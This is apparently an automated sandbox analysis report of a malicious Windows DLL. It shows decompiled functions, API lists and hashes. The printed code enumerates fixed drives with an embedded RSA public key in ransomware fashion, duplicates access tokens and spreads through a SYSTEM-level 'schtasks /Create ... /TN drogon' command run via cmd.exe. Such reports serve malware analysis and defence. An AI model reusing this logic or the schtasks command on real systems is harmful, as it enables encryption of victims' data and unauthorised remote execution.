                                                                                                          0x04a481b5
                                                                                                          0x04a481bd
                                                                                                          0x04a481c1
                                                                                                          0x04a481c1
                                                                                                          0x04a481c8
                                                                                                          0x04a481ce
                                                                                                          0x04a481dd
                                                                                                          0x04a481df
                                                                                                          0x04a481f0
                                                                                                          0x04a481fa
                                                                                                          0x04a48202
                                                                                                          0x04a48205
                                                                                                          0x04a48209
                                                                                                          0x04a4820c
                                                                                                          0x04a48210
                                                                                                          0x04a48213
                                                                                                          0x04a48217
                                                                                                          0x04a4821a
                                                                                                          0x04a4821e
                                                                                                          0x04a48221
                                                                                                          0x04a48225
                                                                                                          0x04a48228
                                                                                                          0x04a4822c
                                                                                                          0x04a4822f
                                                                                                          0x04a48233
                                                                                                          0x04a48236
                                                                                                          0x04a4823a
                                                                                                          0x04a4823d
                                                                                                          0x04a48241
                                                                                                          0x04a48244
                                                                                                          0x04a48248
                                                                                                          0x04a4824b
                                                                                                          0x04a4824f
                                                                                                          0x04a48252
                                                                                                          0x04a48256
                                                                                                          0x04a4825b
                                                                                                          0x04a4825f
                                                                                                          0x04a48262
                                                                                                          0x04a48266
                                                                                                          0x04a48269
                                                                                                          0x04a4826f
                                                                                                          0x04a48273
                                                                                                          0x04a48276
                                                                                                          0x04a4827a
                                                                                                          0x04a4827d
                                                                                                          0x04a48283
                                                                                                          0x04a48287
                                                                                                          0x04a4828a
                                                                                                          0x04a4828e
                                                                                                          0x04a4828f
                                                                                                          0x04a48295
                                                                                                          0x04a48296
                                                                                                          0x04a4829c
                                                                                                          0x04a482ab
                                                                                                          0x04a482b7
                                                                                                          0x04a482ce
                                                                                                          0x04a482e0
                                                                                                          0x04a482e5
                                                                                                          0x04a482e5
                                                                                                          0x04a482b7
                                                                                                          0x04a482e8
                                                                                                          0x04a482ed

                                                                                                          APIs
                                                                                                          • GetLocalTime.KERNEL32(?,00000000), ref: 04A481AF
                                                                                                            • Part of subcall function 04A46477: GetTickCount.KERNEL32 ref: 04A46477
                                                                                                          • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04A481F2
                                                                                                          • PathAppendW.SHLWAPI(?,?), ref: 04A482AF
                                                                                                          • wsprintfW.USER32 ref: 04A482CE
                                                                                                            • Part of subcall function 04A47FB7: wsprintfW.USER32 ref: 04A47FD6
                                                                                                            • Part of subcall function 04A47FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04A47FFA
                                                                                                            • Part of subcall function 04A47FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04A4800C
                                                                                                            • Part of subcall function 04A47FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04A48022
                                                                                                            • Part of subcall function 04A47FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04A48069
                                                                                                            • Part of subcall function 04A47FB7: Sleep.KERNELBASE(00000000), ref: 04A4807F
                                                                                                          Strings
                                                                                                          • schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00, xrefs: 04A482C8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DirectorySystemwsprintf$AppendCountCreateEnvironmentLocalPathProcessSleepTickTimeVariablelstrcat
                                                                                                          • String ID: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
                                                                                                          • API String ID: 2586884543-3727968613
                                                                                                          • Opcode ID: b1dc2e9952b6b2d6dc3cbc0b00718a7d8df1f20cc9bc5e566d3cfcbe59fce12a
                                                                                                          • Instruction ID: 5f979869d893ab1cbb352d50e9089de05033f25fc3e66b9876cbfa091b66baa1
                                                                                                          • Opcode Fuzzy Hash: b1dc2e9952b6b2d6dc3cbc0b00718a7d8df1f20cc9bc5e566d3cfcbe59fce12a
                                                                                                          • Instruction Fuzzy Hash: 6E419626A58348A9EB10DBE4EC16BFE73B9EFC4B10F10541BE504FB1D0E6B65A84C359
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 45%
                                                                                                          			E04A4A016(void* _a7312, void* _a7316, void* _a7324) {
                                                                                                          				short _v36;
                                                                                                          				intOrPtr _v40;
                                                                                                          				void* _v44;
                                                                                                          				void* _v48;
                                                                                                          				char _v64;
                                                                                                          				void* __esi;
                                                                                                          				int _t21;
                                                                                                          				HANDLE* _t23;
                                                                                                          				HANDLE* _t51;
                                                                                                          
                                                                                                          				_v48 = 0;
                                                                                                          				_v44 = 0;
                                                                                                          				_t21 = OpenThreadToken(GetCurrentThread(), 0xb, 1,  &_v48);
                                                                                                          				_t57 = _t21;
                                                                                                          				if(_t21 != 0) {
                                                                                                          					DuplicateTokenEx(_v48, 0x2000000, 0, 2, 2,  &_v44);
                                                                                                          				}
                                                                                                          				_v40 =  *0x4a57bb8;
                                                                                                          				_t23 = E04A46C5F(0x24, E04A46AA8, 0, 0xffff); // executed
                                                                                                          				_t51 = _t23;
                                                                                                          				E04A475D8(_t51, 0); // executed
                                                                                                          				E04A476F2(_t51); // executed
                                                                                                          				E04A46CC8(_t51);
                                                                                                          				_t45 = _t51;
                                                                                                          				_t43 = E04A46B0E(_t51, _t57,  &_v64);
                                                                                                          				if(_t28 != 0) {
                                                                                                          					do {
                                                                                                          						if(E04A49534( &_v36, 0, 0, 0) != 0) {
                                                                                                          							E04A46B5F( &_v36, _t51, _t43);
                                                                                                          							_t45 =  &_v44;
                                                                                                          							E04A46B5F( &_v44, _v48, 0);
                                                                                                          						}
                                                                                                          						_v36 = 0;
                                                                                                          					} while (E04A46AD0(_t45,  &_v36) != 0);
                                                                                                          					E04A46B46(_t43);
                                                                                                          				}
                                                                                                          				if(_v48 != 0) {
                                                                                                          					CloseHandle(_v48);
                                                                                                          					_v48 = 0;
                                                                                                          				}
                                                                                                          				if(_v44 != 0) {
                                                                                                          					CloseHandle(_v44);
                                                                                                          				}
                                                                                                          				return 0;
                                                                                                          			}












                                                                                                          0x04a4a02d
                                                                                                          0x04a4a031
                                                                                                          0x04a4a03c
                                                                                                          0x04a4a042
                                                                                                          0x04a4a044
                                                                                                          0x04a4a059
                                                                                                          0x04a4a059
                                                                                                          0x04a4a071
                                                                                                          0x04a4a075
                                                                                                          0x04a4a07a
                                                                                                          0x04a4a07e
                                                                                                          0x04a4a084
                                                                                                          0x04a4a089
                                                                                                          0x04a4a093
                                                                                                          0x04a4a09a
                                                                                                          0x04a4a09e
                                                                                                          0x04a4a0a0
                                                                                                          0x04a4a0af
                                                                                                          0x04a4a0b7
                                                                                                          0x04a4a0c1
                                                                                                          0x04a4a0c5
                                                                                                          0x04a4a0c5
                                                                                                          0x04a4a0cc
                                                                                                          0x04a4a0db
                                                                                                          0x04a4a0e0
                                                                                                          0x04a4a0e0
                                                                                                          0x04a4a0ef
                                                                                                          0x04a4a0f5
                                                                                                          0x04a4a0f7
                                                                                                          0x04a4a0f7
                                                                                                          0x04a4a0ff
                                                                                                          0x04a4a105
                                                                                                          0x04a4a105
                                                                                                          0x04a4a10f

                                                                                                          APIs
                                                                                                          • GetCurrentThread.KERNEL32 ref: 04A4A035
                                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04A4A1D0,00000000), ref: 04A4A03C
                                                                                                          • DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 04A4A059
                                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000024,Function_00006AA8,00000000,0000FFFF), ref: 04A4A0F5
                                                                                                          • CloseHandle.KERNEL32(0000FFFF,?,00000000,00000000,00000000,00000024,Function_00006AA8,00000000,0000FFFF), ref: 04A4A105
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleThreadToken$CurrentDuplicateOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3602278934-0
                                                                                                          • Opcode ID: bda07652dbef3a3c703949504b61021317505aa0515981a886e2c2bc1ea253d9
                                                                                                          • Instruction ID: f05243d935df71e16f2c1d4c84d9322c3822bdd662f6306b0c6dfc0dfd39578c
                                                                                                          • Opcode Fuzzy Hash: bda07652dbef3a3c703949504b61021317505aa0515981a886e2c2bc1ea253d9
                                                                                                          • Instruction Fuzzy Hash: 3221BF71644340ABE220EF659D48E6FBBECEFD5704F00492DF544D2090EB78E905CBA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 82%
                                                                                                          			E04A49376(short* _a4, short* _a8) {
                                                                                                          				int _v8;
                                                                                                          				intOrPtr _v12;
                                                                                                          				intOrPtr _v16;
                                                                                                          				char _v284;
                                                                                                          				char _v548;
                                                                                                          				char _v1068;
                                                                                                          				intOrPtr _t19;
                                                                                                          				short* _t20;
                                                                                                          				char* _t25;
                                                                                                          				void* _t31;
                                                                                                          
                                                                                                          				_v16 =  *0x4a57b94;
                                                                                                          				_t19 =  *0x4a53984; // 0x32e55b8
                                                                                                          				_v12 = _t19;
                                                                                                          				_v8 = 0;
                                                                                                          				_t20 = PathFindFileNameW(0x4a57bc8);
                                                                                                          				if(_t20 != 0) {
                                                                                                          					_t35 =  &_v548;
                                                                                                          					WideCharToMultiByte(0xfde9, 0, _t20, 0xffffffff,  &_v548, 0x104, 0, 0);
                                                                                                          					WideCharToMultiByte(0xfde9, 0, _a4, 0xffffffff,  &_v284, 0x104, 0, 0);
                                                                                                          					_t25 =  &_v284;
                                                                                                          					__imp__#11(_t25);
                                                                                                          					if(_t25 != 0xffffffff || E04A49332( &_v284,  &_v284) != 0) {
                                                                                                          						WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff,  &_v1068, 0x208, 0, 0);
                                                                                                          						_t31 = E04A45337(_t35,  &_v284,  &_v1068,  &_v548, _v12, _v16); // executed
                                                                                                          						if(_t31 == 0) {
                                                                                                          							_v8 = 1;
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _v8;
                                                                                                          			}













                                                                                                          0x04a49387
                                                                                                          0x04a4938a
                                                                                                          0x04a49396
                                                                                                          0x04a49399
                                                                                                          0x04a4939c
                                                                                                          0x04a493a4
                                                                                                          0x04a493b7
                                                                                                          0x04a493c8
                                                                                                          0x04a493df
                                                                                                          0x04a493e1
                                                                                                          0x04a493e8
                                                                                                          0x04a493f1
                                                                                                          0x04a49418
                                                                                                          0x04a49435
                                                                                                          0x04a4943c
                                                                                                          0x04a4943e
                                                                                                          0x04a4943e
                                                                                                          0x04a4943c
                                                                                                          0x04a493f1
                                                                                                          0x04a4944c

                                                                                                          APIs
                                                                                                          • PathFindFileNameW.SHLWAPI(04A57BC8,?,00000000,00000000), ref: 04A4939C
                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000104,00000000,00000000), ref: 04A493C8
                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 04A493DF
                                                                                                          • inet_addr.WS2_32(?), ref: 04A493E8
                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000208,00000000,00000000), ref: 04A49418
                                                                                                            • Part of subcall function 04A49332: gethostbyname.WS2_32(04A493FF), ref: 04A4933B
                                                                                                            • Part of subcall function 04A49332: wsprintfA.USER32 ref: 04A49365
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$FileFindNamePathgethostbynameinet_addrwsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 3160354238-0
                                                                                                          • Opcode ID: 8324b628c548c8115b6aa1fc4b1e6eabbfa39f57e689ec5eca5fc0f144202f2a
                                                                                                          • Instruction ID: 0c0c68c274799f7ffc8d687be0124635d2f5ed0cecbada63980a746cc7079c62
                                                                                                          • Opcode Fuzzy Hash: 8324b628c548c8115b6aa1fc4b1e6eabbfa39f57e689ec5eca5fc0f144202f2a
                                                                                                          • Instruction Fuzzy Hash: D9212FB290011CBEEF10DBA4DD84DEFB77CEB84364F504295F615E6180D674AE459B60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A46C5F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                          				void* __esi;
                                                                                                          				signed int _t14;
                                                                                                          				void* _t17;
                                                                                                          				struct _CRITICAL_SECTION* _t24;
                                                                                                          
                                                                                                          				_t24 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                          				if(_t24 != 0) {
                                                                                                          					InitializeCriticalSection(_t24);
                                                                                                          					_t14 = _a16;
                                                                                                          					 *(_t24 + 0x20) = _t14;
                                                                                                          					 *((intOrPtr*)(_t24 + 0x1c)) = _a4;
                                                                                                          					 *((intOrPtr*)(_t24 + 0x2c)) = _a8;
                                                                                                          					_t22 = _a12;
                                                                                                          					 *((intOrPtr*)(_t24 + 0x24)) = 0;
                                                                                                          					 *((intOrPtr*)(_t24 + 0x30)) = _a12;
                                                                                                          					_t17 = RtlAllocateHeap(GetProcessHeap(), 8, _t14 << 2); // executed
                                                                                                          					 *(_t24 + 0x18) = _t17;
                                                                                                          					if(_t17 == 0) {
                                                                                                          						E04A46BD1(_t22, _t24);
                                                                                                          						_t24 = 0;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _t24;
                                                                                                          			}







                                                                                                          0x04a46c7a
                                                                                                          0x04a46c7e
                                                                                                          0x04a46c81
                                                                                                          0x04a46c87
                                                                                                          0x04a46c8d
                                                                                                          0x04a46c90
                                                                                                          0x04a46c99
                                                                                                          0x04a46c9c
                                                                                                          0x04a46ca2
                                                                                                          0x04a46ca9
                                                                                                          0x04a46caf
                                                                                                          0x04a46cb1
                                                                                                          0x04a46cb6
                                                                                                          0x04a46cb8
                                                                                                          0x04a46cbd
                                                                                                          0x04a46cbd
                                                                                                          0x04a46cb6
                                                                                                          0x04a46cc5

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000034,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C6F
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C78
                                                                                                          • InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C81
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46CAC
                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46CAF
                                                                                                            • Part of subcall function 04A46BD1: GetProcessHeap.KERNEL32(00000000,?,74714F20,77D44620,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C29
                                                                                                            • Part of subcall function 04A46BD1: HeapFree.KERNEL32(00000000,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C2C
                                                                                                            • Part of subcall function 04A46BD1: GetProcessHeap.KERNEL32(00000000,?,74714F20,77D44620,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C39
                                                                                                            • Part of subcall function 04A46BD1: HeapFree.KERNEL32(00000000,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C3C
                                                                                                            • Part of subcall function 04A46BD1: GetProcessHeap.KERNEL32(00000000,?,74714F20,77D44620,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C4E
                                                                                                            • Part of subcall function 04A46BD1: HeapFree.KERNEL32(00000000,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C51
                                                                                                            • Part of subcall function 04A46BD1: GetProcessHeap.KERNEL32(00000000,00000000,74714F20,77D44620,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C56
                                                                                                            • Part of subcall function 04A46BD1: HeapFree.KERNEL32(00000000,?,?,04A46CBD,?,?,00000000,?,04A47A55,00000024,04A46AA8,00000000,0000FFFF), ref: 04A46C59
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Free$AllocAllocateCriticalInitializeSection
                                                                                                          • String ID:
                                                                                                          • API String ID: 1652351593-0
                                                                                                          • Opcode ID: 65c7516e9cfcb1e147edc15c8db5cc1ae97c9fdc1d3b1e04ed8e62d1d9894ce5
                                                                                                          • Instruction ID: 16bb9ae479bdafdef65cf14f78e28d7ad1ed39e692fe3d3cf0c8b59fd34be658
                                                                                                          • Opcode Fuzzy Hash: 65c7516e9cfcb1e147edc15c8db5cc1ae97c9fdc1d3b1e04ed8e62d1d9894ce5
                                                                                                          • Instruction Fuzzy Hash: E3014671601714ABD320DFAAE890A1BFBE8FFD9750F00451EE949DB740CA75E8018BA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 96%
                                                                                                          			E04A4636B(void* _a4, intOrPtr _a8) {
                                                                                                          				signed char _v8;
                                                                                                          				signed int _v12;
                                                                                                          				short _v14;
                                                                                                          				short _v16;
                                                                                                          				short _v18;
                                                                                                          				short _v20;
                                                                                                          				long _t24;
                                                                                                          				void* _t27;
                                                                                                          				short _t30;
                                                                                                          				short _t31;
                                                                                                          				void* _t34;
                                                                                                          				void _t35;
                                                                                                          				signed char _t36;
                                                                                                          				signed int _t40;
                                                                                                          				void* _t47;
                                                                                                          
                                                                                                          				_t35 =  *0x4a57bbc;
                                                                                                          				_t24 = GetLogicalDrives(); // executed
                                                                                                          				_v12 = _t24;
                                                                                                          				_v8 = 0x1f;
                                                                                                          				do {
                                                                                                          					_t36 = _v8;
                                                                                                          					_t27 = 1 << _t36;
                                                                                                          					if((_v12 & 1) != 0) {
                                                                                                          						_v20 = _t36 + 0x41;
                                                                                                          						_t30 = 0x3a;
                                                                                                          						_v18 = _t30;
                                                                                                          						_t31 = 0x5c;
                                                                                                          						_v16 = _t31;
                                                                                                          						_v14 = 0;
                                                                                                          						_t27 = GetDriveTypeW( &_v20); // executed
                                                                                                          						if(_t27 == 3) {
                                                                                                          							_t27 = LocalAlloc(0x40, 0x50);
                                                                                                          							if(_t27 != 0) {
                                                                                                          								 *((intOrPtr*)(_t27 + 0x4c)) = _a8;
                                                                                                          								 *_t27 = _t35;
                                                                                                          								 *(_t27 + 0x34) = L"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB";
                                                                                                          								 *(_t27 + 4) = _v20;
                                                                                                          								 *((intOrPtr*)(_t27 + 8)) = _v16;
                                                                                                          								_t40 = 8;
                                                                                                          								_t20 = _t27 + 0xc; // 0xc
                                                                                                          								_t34 = memcpy(_t20, _a4, _t40 << 2);
                                                                                                          								_t47 = _t47 + 0xc;
                                                                                                          								asm("movsb"); // executed
                                                                                                          								_t27 = CreateThread(0, 0, E04A46299, _t34, 0, 0); // executed
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          					_t22 =  &_v8;
                                                                                                          					 *_t22 = _v8 - 1;
                                                                                                          				} while ( *_t22 >= 0);
                                                                                                          				return _t27;
                                                                                                          			}


















                                                                                                          0x04a46372
                                                                                                          0x04a4637a
                                                                                                          0x04a46380
                                                                                                          0x04a46383
                                                                                                          0x04a4638a
                                                                                                          0x04a4638a
                                                                                                          0x04a46390
                                                                                                          0x04a46395
                                                                                                          0x04a4639e
                                                                                                          0x04a463a2
                                                                                                          0x04a463a3
                                                                                                          0x04a463a9
                                                                                                          0x04a463aa
                                                                                                          0x04a463b0
                                                                                                          0x04a463b8
                                                                                                          0x04a463c1
                                                                                                          0x04a463c7
                                                                                                          0x04a463d1
                                                                                                          0x04a463d9
                                                                                                          0x04a463dc
                                                                                                          0x04a463de
                                                                                                          0x04a463ea
                                                                                                          0x04a463f0
                                                                                                          0x04a463f3
                                                                                                          0x04a463f4
                                                                                                          0x04a463f8
                                                                                                          0x04a463f8
                                                                                                          0x04a46403
                                                                                                          0x04a46404
                                                                                                          0x04a46404
                                                                                                          0x04a463d1
                                                                                                          0x04a463c1
                                                                                                          0x04a4640a
                                                                                                          0x04a4640a
                                                                                                          0x04a4640a
                                                                                                          0x04a46417

                                                                                                          APIs
                                                                                                          • GetLogicalDrives.KERNELBASE ref: 04A4637A
                                                                                                          • GetDriveTypeW.KERNELBASE(?), ref: 04A463B8
                                                                                                          • LocalAlloc.KERNEL32(00000040,00000050), ref: 04A463C7
                                                                                                          • CreateThread.KERNELBASE ref: 04A46404
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocCreateDriveDrivesLocalLogicalThreadType
                                                                                                          • String ID:
                                                                                                          • API String ID: 2320387513-0
                                                                                                          • Opcode ID: cfc7bfcdc540c3ad5fffb9d17d8b4bb8822c7e2697e533b645cec075c292cce2
                                                                                                          • Instruction ID: 5cf8b5d51d7b7dcd8f7eaa05ff231666847e01ccbd87c4248c32572414b198ef
                                                                                                          • Opcode Fuzzy Hash: cfc7bfcdc540c3ad5fffb9d17d8b4bb8822c7e2697e533b645cec075c292cce2
                                                                                                          • Instruction Fuzzy Hash: C811D375A00204EFDB00DFA8D844AAEBBB4FFC9310F10C45EE905EB281D735A942CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A4A333(void* __eflags, void* _a4) {
                                                                                                          				short _v36;
                                                                                                          				void* _t13;
                                                                                                          				void* _t24;
                                                                                                          				void* _t32;
                                                                                                          
                                                                                                          				_t32 = __eflags;
                                                                                                          				_t24 = _a4;
                                                                                                          				Sleep( *_t24); // executed
                                                                                                          				_t27 =  *0x4a57bb8;
                                                                                                          				_t22 =  *0x4a57bb8;
                                                                                                          				_t20 = E04A46B0E(_t27, _t32,  &_v36);
                                                                                                          				if(_t8 != 0) {
                                                                                                          					do {
                                                                                                          						_t13 = E04A49F27( &_v36); // executed
                                                                                                          						if(_t13 != 0) {
                                                                                                          							_t22 =  &_v36;
                                                                                                          							E04A46B5F( &_v36, _t27, _t20);
                                                                                                          						}
                                                                                                          						_v36 = 0;
                                                                                                          					} while (E04A46AD0(_t22,  &_v36) != 0);
                                                                                                          					E04A46B46(_t20);
                                                                                                          				}
                                                                                                          				HeapFree(GetProcessHeap(), 0, _t24);
                                                                                                          				return 0;
                                                                                                          			}







                                                                                                          0x04a4a333
                                                                                                          0x04a4a33f
                                                                                                          0x04a4a344
                                                                                                          0x04a4a34a
                                                                                                          0x04a4a355
                                                                                                          0x04a4a35c
                                                                                                          0x04a4a360
                                                                                                          0x04a4a362
                                                                                                          0x04a4a367
                                                                                                          0x04a4a36e
                                                                                                          0x04a4a372
                                                                                                          0x04a4a376
                                                                                                          0x04a4a376
                                                                                                          0x04a4a37d
                                                                                                          0x04a4a38c
                                                                                                          0x04a4a391
                                                                                                          0x04a4a391
                                                                                                          0x04a4a3a0
                                                                                                          0x04a4a3ae

                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(?), ref: 04A4A344
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?), ref: 04A4A399
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A4A3A0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$FreeProcessSleep
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 1803097132-636472023
                                                                                                          • Opcode ID: 95c7f9a3ac5fda7b026c275371167270ad281a58d25626289efa946f0077144a
                                                                                                          • Instruction ID: 9d5225f2e96688c973b8d7e9722dae6101952f5694e143cc6c8baf552159ac8d
                                                                                                          • Opcode Fuzzy Hash: 95c7f9a3ac5fda7b026c275371167270ad281a58d25626289efa946f0077144a
                                                                                                          • Instruction Fuzzy Hash: 46016D766047066BE710EFB59D84DAFB7ACEFE9314F040929F905C2050EB29F91AC7A1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 27%
                                                                                                          			E04A4A112(void* __ecx, void* _a4, void* _a7352) {
                                                                                                          				intOrPtr _v8;
                                                                                                          				void _v12;
                                                                                                          				intOrPtr _t10;
                                                                                                          				void* _t16;
                                                                                                          				void* _t21;
